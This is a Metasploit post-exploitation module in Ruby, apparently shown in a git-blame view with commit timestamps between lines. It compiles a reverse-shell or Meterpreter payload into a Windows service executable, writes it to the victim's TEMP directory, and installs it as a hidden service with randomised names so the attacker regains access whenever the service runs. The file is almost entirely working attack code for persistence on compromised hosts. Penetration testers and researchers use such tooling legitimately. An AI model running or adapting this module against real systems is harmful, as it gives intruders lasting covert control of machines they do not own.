2018-10-17 18:09:16 +08:00
|
|
|
##
|
|
|
|
|
# This module requires Metasploit: https://metasploit.com/download
|
|
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
|
##
|
|
|
|
|
require 'metasploit/framework/compiler/windows'
|
|
|
|
|
|
2018-10-22 18:07:40 +08:00
|
|
|
class MetasploitModule < Msf::Exploit::Local
|
|
|
|
|
Rank = ExcellentRanking
|
|
|
|
|
|
2018-10-17 18:09:16 +08:00
|
|
|
include Msf::Post::Common
|
|
|
|
|
include Msf::Post::File
|
|
|
|
|
include Msf::Post::Windows::Priv
|
|
|
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
|
super(update_info(info,
|
2018-10-18 12:01:57 +08:00
|
|
|
'Name' => 'Windows Persistent Service Installer',
|
2018-10-17 18:09:16 +08:00
|
|
|
'Description' => %q{
|
2018-10-18 12:01:57 +08:00
|
|
|
This Module will generate and upload an executable to a remote host, next will make it a persistent service.
|
|
|
|
|
It will create a new service which will start the payload whenever the service is running. Admin or system
|
|
|
|
|
privilege is required.
|
2018-10-17 18:09:16 +08:00
|
|
|
},
|
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
|
'Author' => [ 'Green-m <greenm.xxoo[at]gmail.com>' ],
|
|
|
|
|
'Platform' => [ 'windows' ],
|
2018-10-22 18:07:40 +08:00
|
|
|
'Targets' => [['Windows', {}]],
|
2019-11-16 04:57:18 +00:00
|
|
|
'SessionTypes' => [ 'meterpreter' ],
|
|
|
|
|
'DefaultTarget' => 0,
|
|
|
|
|
'References' => [
|
2018-10-22 18:07:40 +08:00
|
|
|
[ 'URL', 'https://github.com/rapid7/metasploit-framework/blob/master/external/source/metsvc/src/metsvc.cpp' ]
|
2018-10-23 09:44:36 +08:00
|
|
|
],
|
|
|
|
|
'DisclosureDate'=> "Oct 20 2018"
|
2018-10-17 18:09:16 +08:00
|
|
|
))
|
|
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
|
[
|
2018-10-22 18:07:40 +08:00
|
|
|
OptInt.new('RETRY_TIME', [false, 'The retry time that shell connect failed. 5 seconds as default.', 5 ]),
|
|
|
|
|
OptString.new('REMOTE_EXE_PATH', [false, 'The remote victim exe path to run. Use temp directory as default. ']),
|
|
|
|
|
OptString.new('REMOTE_EXE_NAME', [false, 'The remote victim name. Random string as default.']),
|
|
|
|
|
OptString.new('SERVICE_NAME', [false, 'The name of service. Random string as default.' ]),
|
|
|
|
|
OptString.new('SERVICE_DESCRIPTION', [false, 'The description of service. Random string as default.' ])
|
|
|
|
|
])
|
2018-10-17 18:09:16 +08:00
|
|
|
end
|
|
|
|
|
|
|
|
|
|
# Run Method for when run command is issued
|
|
|
|
|
#-------------------------------------------------------------------------------
|
2018-10-22 18:07:40 +08:00
|
|
|
def exploit
|
2018-10-17 18:09:16 +08:00
|
|
|
unless is_system? || is_admin?
|
|
|
|
|
print_error("Insufficient privileges to create service")
|
|
|
|
|
return
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
unless datastore['PAYLOAD'] =~ %r#^windows/(shell|meterpreter)/reverse#
|
|
|
|
|
print_error("Only support for windows meterpreter/shell reverse staged payload")
|
|
|
|
|
return
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
print_status("Running module against #{sysinfo['Computer']}")
|
|
|
|
|
|
|
|
|
|
# Set variables
|
2018-10-22 18:07:40 +08:00
|
|
|
rexepath = datastore['REMOTE_EXE_PATH']
|
|
|
|
|
@retry_time = datastore['RETRY_TIME']
|
|
|
|
|
rexename = datastore['REMOTE_EXE_NAME'] || Rex::Text.rand_text_alpha(4..8)
|
|
|
|
|
@service_name = datastore['SERVICE_NAME'] || Rex::Text.rand_text_alpha(4..8)
|
|
|
|
|
@service_description = datastore['SERVICE_DESCRIPTION'] || Rex::Text.rand_text_alpha(8..16)
|
2018-10-17 18:09:16 +08:00
|
|
|
|
|
|
|
|
# Add the windows pe suffix to rexename
|
|
|
|
|
unless rexename.end_with?('.exe')
|
|
|
|
|
rexename << ".exe"
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
host, _port = session.tunnel_peer.split(':')
|
|
|
|
|
@clean_up_rc = ""
|
|
|
|
|
|
|
|
|
|
buf = create_payload
|
2018-12-14 09:12:32 -06:00
|
|
|
vprint_status(buf)
|
2018-10-17 18:09:16 +08:00
|
|
|
metsvc_code = metsvc_template(buf)
|
|
|
|
|
bin = Metasploit::Framework::Compiler::Windows.compile_c(metsvc_code)
|
|
|
|
|
|
2018-12-14 09:14:27 -06:00
|
|
|
victim_path = write_exe_to_target(bin, rexename, rexepath)
|
2018-10-17 18:09:16 +08:00
|
|
|
install_service(victim_path)
|
|
|
|
|
|
|
|
|
|
clean_rc = log_file
|
|
|
|
|
file_local_write(clean_rc, @clean_up_rc)
|
|
|
|
|
print_status("Cleanup Meterpreter RC File: #{clean_rc}")
|
|
|
|
|
|
|
|
|
|
report_note(host: host,
|
|
|
|
|
type: "host.persistance.cleanup",
|
|
|
|
|
data: {
|
|
|
|
|
local_id: session.sid,
|
|
|
|
|
stype: session.type,
|
|
|
|
|
desc: session.info,
|
|
|
|
|
platform: session.platform,
|
|
|
|
|
via_payload: session.via_payload,
|
|
|
|
|
via_exploit: session.via_exploit,
|
|
|
|
|
created_at: Time.now.utc,
|
|
|
|
|
commands: @clean_up_rc
|
|
|
|
|
})
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
def create_payload
|
2018-12-14 09:12:32 -06:00
|
|
|
p = payload.encoded
|
|
|
|
|
Msf::Simple::Buffer.transform(p, 'c', 'buf')
|
2018-10-17 18:09:16 +08:00
|
|
|
end
|
|
|
|
|
|
|
|
|
|
# Function for writing executable to target host
|
|
|
|
|
# Code from post/windows/manage/persistence_exe
|
|
|
|
|
#
|
2018-12-14 09:14:27 -06:00
|
|
|
def write_exe_to_target(rexe, rexename, rexepath)
|
2018-10-17 18:09:16 +08:00
|
|
|
# check if we have write permission
|
|
|
|
|
if rexepath
|
|
|
|
|
begin
|
|
|
|
|
temprexe = rexepath + "\\" + rexename
|
|
|
|
|
write_file_to_target(temprexe,rexe)
|
|
|
|
|
rescue Rex::Post::Meterpreter::RequestError
|
|
|
|
|
print_warning("Insufficient privileges to write in #{rexepath}, writing to %TEMP%")
|
2019-05-31 17:44:35 -05:00
|
|
|
temprexe = session.sys.config.getenv('TEMP') + "\\" + rexename
|
2018-10-17 18:09:16 +08:00
|
|
|
write_file_to_target(temprexe,rexe)
|
|
|
|
|
end
|
|
|
|
|
|
2018-10-22 18:07:40 +08:00
|
|
|
# Write to %temp% directory if not set REMOTE_EXE_PATH
|
2018-10-17 18:09:16 +08:00
|
|
|
else
|
2019-05-31 17:44:35 -05:00
|
|
|
temprexe = session.sys.config.getenv('TEMP') + "\\" + rexename
|
2018-10-17 18:09:16 +08:00
|
|
|
write_file_to_target(temprexe,rexe)
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
print_good("Meterpreter service exe written to #{temprexe}")
|
|
|
|
|
|
|
|
|
|
@clean_up_rc << "execute -H -i -f taskkill.exe -a \"/f /im #{rexename}\"\n" # Use interact to wait until the task ended.
|
2018-12-17 07:00:23 -06:00
|
|
|
@clean_up_rc << "rm \"#{temprexe.gsub("\\", "\\\\\\\\")}\"\n"
|
2018-10-17 18:09:16 +08:00
|
|
|
|
|
|
|
|
temprexe
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
def write_file_to_target(temprexe,rexe)
|
|
|
|
|
fd = session.fs.file.new(temprexe, "wb")
|
|
|
|
|
fd.write(rexe)
|
|
|
|
|
fd.close
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
# Function for creating log folder and returning log path
|
|
|
|
|
#-------------------------------------------------------------------------------
|
2018-12-14 09:10:29 -06:00
|
|
|
def log_file
|
2018-10-17 18:09:16 +08:00
|
|
|
# Get hostname
|
|
|
|
|
host = session.sys.config.sysinfo["Computer"]
|
|
|
|
|
|
|
|
|
|
# Create Filename info to be appended to downloaded files
|
|
|
|
|
filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")
|
|
|
|
|
|
|
|
|
|
# Create a directory for the logs
|
2018-12-14 09:10:29 -06:00
|
|
|
logs = ::File.join(Msf::Config.log_directory, 'persistence', Rex::FileUtils.clean_path(host + filenameinfo))
|
2018-10-17 18:09:16 +08:00
|
|
|
|
|
|
|
|
# Create the log directory
|
|
|
|
|
::FileUtils.mkdir_p(logs)
|
|
|
|
|
|
2018-12-14 09:10:29 -06:00
|
|
|
logs + ::File::Separator + Rex::FileUtils.clean_path(host + filenameinfo) + ".rc"
|
2018-10-17 18:09:16 +08:00
|
|
|
end
|
|
|
|
|
|
|
|
|
|
# Function to install payload as a service
|
|
|
|
|
#-------------------------------------------------------------------------------
|
|
|
|
|
def install_service(path)
|
|
|
|
|
print_status("Creating service #{@service_name}")
|
|
|
|
|
|
|
|
|
|
begin
|
2018-12-17 10:25:06 +08:00
|
|
|
session.sys.process.execute("cmd.exe /c \"#{path}\" #{@install_cmd}", nil, {'Hidden' => true})
|
2018-10-17 18:09:16 +08:00
|
|
|
rescue ::Exception => e
|
|
|
|
|
print_error("Failed to install the service.")
|
|
|
|
|
print_error(e.to_s)
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
@clean_up_rc = "execute -H -f sc.exe -a \"delete #{@service_name}\"\n" + @clean_up_rc
|
|
|
|
|
@clean_up_rc = "execute -H -f sc.exe -a \"stop #{@service_name}\"\n" + @clean_up_rc
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
def metsvc_template(buf)
|
|
|
|
|
@install_cmd = Rex::Text.rand_text_alpha(4..8)
|
|
|
|
|
@start_cmd = Rex::Text.rand_text_alpha(4..8)
|
2018-12-14 13:13:32 -06:00
|
|
|
template = File.read(File.join(Msf::Config.data_directory, 'exploits', 'persistence_service', 'service.erb'))
|
|
|
|
|
ERB.new(template).result(binding)
|
2018-10-17 18:09:16 +08:00
|
|
|
end
|
|
|
|
|
end
|
